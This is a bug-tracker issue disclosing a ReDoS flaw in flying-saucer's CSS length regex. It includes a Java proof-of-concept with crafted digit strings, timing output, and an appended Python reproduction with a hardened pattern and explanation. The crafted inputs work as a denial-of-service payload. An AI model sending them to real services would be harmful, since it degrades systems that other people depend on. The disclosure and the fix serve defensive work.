zhihongzzh / flying-saucer

Automatically exported from code.google.com/p/flying-saucer

Regexp cause ReDoS Attack #245

Open GoogleCodeExporter opened 8 years ago

GoogleCodeExporter commented 8 years ago
The class `Idents` may allow a ReDoS attack.

File: [https://github.com/flyingsaucerproject/flyingsaucer/blob/master/flying-saucer-core/src/main/java/org/xhtmlrenderer/css/constants/Idents.java Idents.java]

`Pattern CSS_LENGTH_PATTERN = Pattern.compile(RCSS_LENGTH);` will get poor performance on some inputs.

Test code is below:

{{{
import java.util.regex.Pattern;

public class R2Test {
    // Patterns as in Idents.java. RCSS_NUMBER is repeated with "+" inside
    // RCSS_LENGTH, so a run of digits can be split between iterations of the
    // group in exponentially many ways; a failed match explores all of them.
    private final static String  RCSS_NUMBER        = "(-)?((\\d){1,10}((\\.)(\\d){1,10})?)";
    private final static String  RCSS_LENGTH        = "((0$)|((" + RCSS_NUMBER + ")+" + "((em)|(ex)|(px)|(cm)|(mm)|(in)|(pt)|(pc)|(%))))";
    private final static Pattern CSS_LENGTH_PATTERN = Pattern.compile(RCSS_LENGTH);

    public static void main(String[] args) {
        // Each input is one digit longer than the previous one. The trailing ','
        // can never match a unit, so matches() backtracks through every possible
        // split of the digit run before returning false.
        { // TEST1: 22 digits
            long start = System.currentTimeMillis();
            looksLikeALength("1111111111111111111111,");
            System.out.println((System.currentTimeMillis() - start) + " ms");
        }
        { // TEST2: 23 digits
            long start = System.currentTimeMillis();
            looksLikeALength("11111111111111111111111,");
            System.out.println((System.currentTimeMillis() - start) + " ms");
        }
        { // TEST3: 24 digits
            long start = System.currentTimeMillis();
            looksLikeALength("111111111111111111111111,");
            System.out.println((System.currentTimeMillis() - start) + " ms");
        }
        { // TEST4: 25 digits
            long start = System.currentTimeMillis();
            looksLikeALength("1111111111111111111111111,");
            System.out.println((System.currentTimeMillis() - start) + " ms");
        }
    }

    // Same check as Idents.looksLikeALength(): matches() requires the whole
    // string to match the pattern.
    public static boolean looksLikeALength(String val) {
        return CSS_LENGTH_PATTERN.matcher(val).matches();
    }
}
}}}

Test result:
{{{
960 ms
1912 ms
3753 ms
7650 ms
}}}

Original issue reported on code.google.com by jht5...@gmail.com on 26 Sep 2014 at 2:17
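To make the failure mode concrete, the following is an added example, not code from the issue or from flying-saucer. It copies the two regex strings from the issue character-for-character into Python's `re`, which is also a backtracking engine and therefore shows the same exponential behaviour (`re.fullmatch()` plays the role of Java's `Matcher.matches()`). The hardened pattern, the `digit_run_partitions` helper and the sample inputs are my own and assume the intended grammar is one optional sign, one number and one unit. The root cause is the `+` around `RCSS_NUMBER`: a run of n digits can be split into chunks of 1 to 10 digits in roughly 2^(n-1) ways, and when the trailing character is not a unit the engine tries every split before failing, which is why the measured time roughly doubles per extra digit.

```python
"""Added example: reproduce the flying-saucer #245 ReDoS in Python's backtracking
re engine and show a fix. The two regex strings are copied from the issue; the
hardened pattern and helpers are my own and assume a CSS length is one optional
sign, one number and one unit."""
import re
import time
from functools import lru_cache

# Copied character-for-character from the issue's R2Test (Java and Python re
# share this syntax). re.fullmatch() plays the role of Java's Matcher.matches().
RCSS_NUMBER = r"(-)?((\d){1,10}((\.)(\d){1,10})?)"
RCSS_LENGTH = ("((0$)|((" + RCSS_NUMBER + ")+"
               "((em)|(ex)|(px)|(cm)|(mm)|(in)|(pt)|(pc)|(%))))")
VULNERABLE = re.compile(RCSS_LENGTH)

# Hardened form (assumption: one sign, one number, one unit). Dropping the "+"
# around the number group leaves exactly one way to consume a digit run, so a
# non-matching input is rejected after a linear amount of work. It also rejects
# inputs like "1-1px" that the repeated group accepted by accident.
HARDENED = re.compile(r"0|-?\d{1,10}(?:\.\d{1,10})?(?:em|ex|px|cm|mm|in|pt|pc|%)")


def looks_like_a_length(val: str, pattern: re.Pattern = HARDENED) -> bool:
    """Port of Idents.looksLikeALength(); defaults to the hardened pattern."""
    return pattern.fullmatch(val) is not None


@lru_cache(maxsize=None)
def digit_run_partitions(n: int, max_chunk: int = 10) -> int:
    """Number of ways (RCSS_NUMBER)+ can split a run of n digits into chunks of
    1..max_chunk digits. Each split is a path the engine explores before giving
    up, so the work for a non-matching input grows with this count, which
    roughly doubles per extra digit (compare the issue's 960/1912/3753/7650 ms)."""
    if n == 0:
        return 1
    return sum(digit_run_partitions(n - k, max_chunk)
               for k in range(1, min(n, max_chunk) + 1))


def time_fullmatch(pattern: re.Pattern, val: str) -> float:
    """Seconds taken by one fullmatch() of val against pattern."""
    start = time.perf_counter()
    pattern.fullmatch(val)
    return time.perf_counter() - start


def patterns_agree(vals) -> bool:
    """True if VULNERABLE and HARDENED classify every value in vals identically.
    Keep the digit runs short: the vulnerable pattern is evaluated here too."""
    return all(looks_like_a_length(v, VULNERABLE) == looks_like_a_length(v, HARDENED)
               for v in vals)


# Constructed sample inputs (not from the issue) for the agreement check; the
# digit runs are short, so none of them triggers heavy backtracking.
SAMPLE_INPUTS = ["0", "0px", "12px", "-1.5em", "100%", ".5em", "12", "px", "1.", "1,"]

if __name__ == "__main__":
    for n in (12, 14, 16, 18):
        bad = "1" * n + ","  # trailing ',' guarantees a failed match, as in the issue
        print(f"{n} digits: {digit_run_partitions(n):>7} splits, "
              f"vulnerable {time_fullmatch(VULNERABLE, bad):.3f}s, "
              f"hardened {time_fullmatch(HARDENED, bad):.6f}s")
    print("agree on samples:", patterns_agree(SAMPLE_INPUTS))
```

Running the module prints the split count beside the measured time for each length; the split count roughly doubles with each added digit while the hardened pattern stays flat. Removing the `+` is the minimal fix for the pattern itself; a maximum token length check before the regex is cheap additional defence, since no legitimate CSS length needs dozens of digits.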